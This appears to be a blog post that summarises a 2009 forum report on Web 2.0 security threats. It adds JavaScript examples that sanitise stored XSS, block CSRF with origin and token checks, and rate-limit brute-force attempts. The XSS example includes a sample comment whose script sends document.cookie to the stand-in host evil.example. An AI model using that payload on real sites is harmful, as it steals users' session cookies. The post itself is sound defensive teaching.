The Secure Enterprise 2.0 Forum has just released its 2009 industry report outlining the top Web 2.0 security threats. These threats are not so much specific to Web 2.0 companies as they are common to any browser-based application.
The list of key Web 2.0 security threats:
- Cross Site Scripting (XSS): Malicious input is sent by an attacker, stored by the system, and later displayed to other users (stored XSS). Systems that let users submit formatted content such as HTML are especially susceptible, because in order to give users control over how their content looks, applications often allow HTML tags that are not safe and can be abused to inject script. Functionality in which many users create content that other users view is typical of Web 2.0 systems such as social networks, blogs, and wikis, and since these applications rely heavily on user-generated input, they are especially exposed to XSS.
- Cross Site Request Forgery / Cross Gadget Request Forgery: The victim visits a malicious Web site. While its content is displayed in the victim's browser, the malicious site's code generates requests to a different site on which the victim is authenticated, for example through a persistent cookie that the browser attaches to every request for that site. Such requests perform operations on the victim's behalf. The same can happen between insecure gadgets hosted on the same Web page (cross gadget request forgery).
- Phishing: The victim receives an e-mail asking them to install a fraudulent widget, or is redirected to a fraudulent Web site and asked to fill in an online form with sensitive information.
- Information Leakage: Web 2.0 applications promote user-generated content and thus blur the line between work and private life. As a result, users may publish, as part of their Web presence, information their employer considers sensitive. Even if users are careful not to leak anything that is sensitive by itself, the aggregation of many small data items may be unacceptable.
- Information Integrity: Correctness of information is one of the key elements of data security. While we usually think of loss of integrity as the result of a malicious hack, unintentional misinformation also leads to loss of integrity.
- Insufficient Anti-Automation: The programmatic interfaces exposed by Web 2.0 applications let an attacker automate attacks. Examples include brute force attacks, Cross Site Request Forgery, automated retrieval of large amounts of information, and automatic creation of accounts, for example as part of a phishing attack.
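To make the XSS item concrete, here is an added example (my own code, not from the report or the original post) of the pattern it describes: a comment renderer that concatenates stored user HTML verbatim, next to a hardened version that escapes everything and then re-enables only a small allowlist of bare formatting tags with no attributes. The allowlist, the `renderUnsafe`/`renderSafe` names and the sample comment are assumptions made for the example.

```javascript
// Added example (not from the report or the post): mitigating stored XSS when
// users are allowed a little formatting. Strategy: HTML-escape everything, then
// re-enable only an allowlist of bare tags that carry no attributes at all.
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li']);

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable rendering: the stored comment is concatenated into the page as-is,
// so any <script> or on* handler the attacker stored runs in every viewer's browser.
function renderUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened rendering: after escaping, a stored tag reads "&lt;b&gt;". Only a tag
// that is exactly an allowlisted name with nothing else inside the brackets is
// turned back into markup; "<b onmouseover=...>", "<script>", "<img src=x onerror=...>"
// and "<a href=javascript:...>" all stay as inert, visible text.
function sanitizeHtml(input) {
  const escaped = escapeHtml(input);
  return escaped.replace(/&lt;(\/?)([a-zA-Z]+)&gt;/g, (match, slash, name) => {
    const tag = name.toLowerCase();
    return ALLOWED_TAGS.has(tag) ? `<${slash}${tag}>` : match;
  });
}

function renderSafe(comment) {
  return `<div class="comment">${sanitizeHtml(comment)}</div>`;
}

// Constructed sample of attacker-supplied "formatted" content (hypothetical URL).
const SAMPLE_COMMENT =
  '<b>Great post</b><script>document.location="https://evil.example/?c="+document.cookie</script>';

console.log(renderUnsafe(SAMPLE_COMMENT)); // script survives
console.log(renderSafe(SAMPLE_COMMENT));   // <b> survives, script is escaped
```

The design choice worth noting is that the safe path never tries to decide which attributes are dangerous; anything that is not a bare allowlisted tag stays escaped, which is what makes the allowlist small enough to audit. A `<br/>` with a trailing slash is also left escaped by this regex, which is the safe direction to fail.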
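For the CSRF item, the following added example (again my own code, not the report's) simulates a state-changing endpoint on a hypothetical `bank.example` without any network: a handler that trusts the session cookie alone, beside one that also checks the request's origin and a per-session synchronizer token that a page on another site cannot read. Request objects, session storage and the names `transferUnsafe`/`transferSafe` are assumptions made for the example.

```javascript
// Added example (not from the report or the post): a state-changing endpoint
// with and without CSRF protection, simulated in-process. Requests are plain
// objects shaped like what a web framework would hand to a handler.
const crypto = require('crypto');

const SITE_ORIGIN = 'https://bank.example'; // hypothetical victim site
const sessions = new Map();                 // session id -> { user, csrfToken }

// Log the user in. The session id goes into a cookie; the CSRF token is
// embedded in same-origin pages (e.g. a hidden form field), never in a cookie.
function createSession(user) {
  const sid = crypto.randomBytes(16).toString('hex');
  const csrfToken = crypto.randomBytes(32).toString('hex');
  sessions.set(sid, { user, csrfToken });
  return { sid, csrfToken };
}

// Constant-time comparison so token checking does not leak via timing.
function tokensMatch(supplied, expected) {
  if (typeof supplied !== 'string' || typeof expected !== 'string') return false;
  const a = Buffer.from(supplied);
  const b = Buffer.from(expected);
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

// Vulnerable handler: the browser attaches the session cookie to any request
// for bank.example, including one that a page on evil.example made it send.
function transferUnsafe(req) {
  const session = sessions.get(req.cookies.sid);
  if (!session) return { status: 401 };
  return { status: 200, from: session.user, to: req.body.to, amount: req.body.amount };
}

// Hardened handler: (1) the Origin (or, failing that, Referer) must be our own
// origin, and the check fails closed when both are absent; (2) the body must
// carry the session's CSRF token, which a cross-site page never sees.
function transferSafe(req) {
  const session = sessions.get(req.cookies.sid);
  if (!session) return { status: 401 };
  let origin = req.headers.origin;
  if (!origin && req.headers.referer) origin = new URL(req.headers.referer).origin;
  if (origin !== SITE_ORIGIN) return { status: 403, reason: 'cross-origin request' };
  if (!tokensMatch(req.body.csrf_token, session.csrfToken)) {
    return { status: 403, reason: 'missing or wrong CSRF token' };
  }
  return { status: 200, from: session.user, to: req.body.to, amount: req.body.amount };
}

// Constructed scenario: alice is logged in, then visits evil.example, whose page
// auto-submits a form to the transfer endpoint using her cookie.
function runScenario() {
  const { sid, csrfToken } = createSession('alice');
  const forged = {
    headers: { origin: 'https://evil.example' },
    cookies: { sid },
    body: { to: 'mallory', amount: 1000 }, // no csrf_token: evil.example never had it
  };
  const legitimate = {
    headers: { origin: SITE_ORIGIN },
    cookies: { sid },
    body: { to: 'bob', amount: 25, csrf_token: csrfToken },
  };
  return {
    forgedUnsafe: transferUnsafe(forged).status,
    forgedSafe: transferSafe(forged).status,
    legitimateSafe: transferSafe(legitimate).status,
  };
}

console.log(runScenario()); // { forgedUnsafe: 200, forgedSafe: 403, legitimateSafe: 200 }
```

The token check is the one that carries the weight: Origin and Referer are useful as a cheap first filter but can be stripped by proxies or privacy settings, which is why the handler rejects when neither is present rather than waving the request through.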
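For the anti-automation item, here is an added example (my own, not from the report) of the minimum a programmatic interface needs in front of login and account-creation endpoints: a per-key sliding-window rate limiter. The limits, the sample IP address and the clock values are constructed for the example; the clock is passed in explicitly so the run is deterministic.

```javascript
// Added example (not from the report or the post): a per-key sliding-window
// rate limiter of the kind that blunts automated password guessing and bulk
// account creation against a public API.
class SlidingWindowLimiter {
  constructor(limit, windowMs) {
    this.limit = limit;       // max requests per key per window
    this.windowMs = windowMs; // window length in milliseconds
    this.hits = new Map();    // key (IP, account, API token, ...) -> recent timestamps
  }

  // Returns true if the request is allowed, false if the key is over budget.
  // nowMs is injected rather than read from Date.now() so callers can test it.
  allow(key, nowMs) {
    const cutoff = nowMs - this.windowMs;
    const recent = (this.hits.get(key) || []).filter((t) => t > cutoff);
    if (recent.length >= this.limit) {
      this.hits.set(key, recent);
      return false; // caller should answer 429 or demand a CAPTCHA here
    }
    recent.push(nowMs);
    this.hits.set(key, recent);
    return true;
  }
}

// Constructed scenario: one IP fires 20 login attempts 100 ms apart, then
// comes back after the window has expired; a second IP is unaffected.
function simulateBruteForce() {
  const limiter = new SlidingWindowLimiter(5, 60_000); // 5 attempts per minute per IP
  const attackerIp = '198.51.100.7';
  let allowed = 0;
  let blocked = 0;
  for (let i = 0; i < 20; i++) {
    if (limiter.allow(attackerIp, i * 100)) allowed++;
    else blocked++;
  }
  return {
    allowed,
    blocked,
    allowedAfterWindow: limiter.allow(attackerIp, 61_000),
    otherIpAllowed: limiter.allow('203.0.113.9', 500),
  };
}

console.log(simulateBruteForce());
// { allowed: 5, blocked: 15, allowedAfterWindow: true, otherIpAllowed: true }
```

Keying only on source IP is the weakest choice, since an attacker can spread requests across many addresses; in practice the same limiter is applied per target account and per API token as well, and the in-memory Map is replaced by shared storage when more than one server handles the traffic.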
Personally, I think the biggest risk is information leakage. Despite any and all attempts to stop information from walking out the door, there is little that can actually be done. More about that in a future post.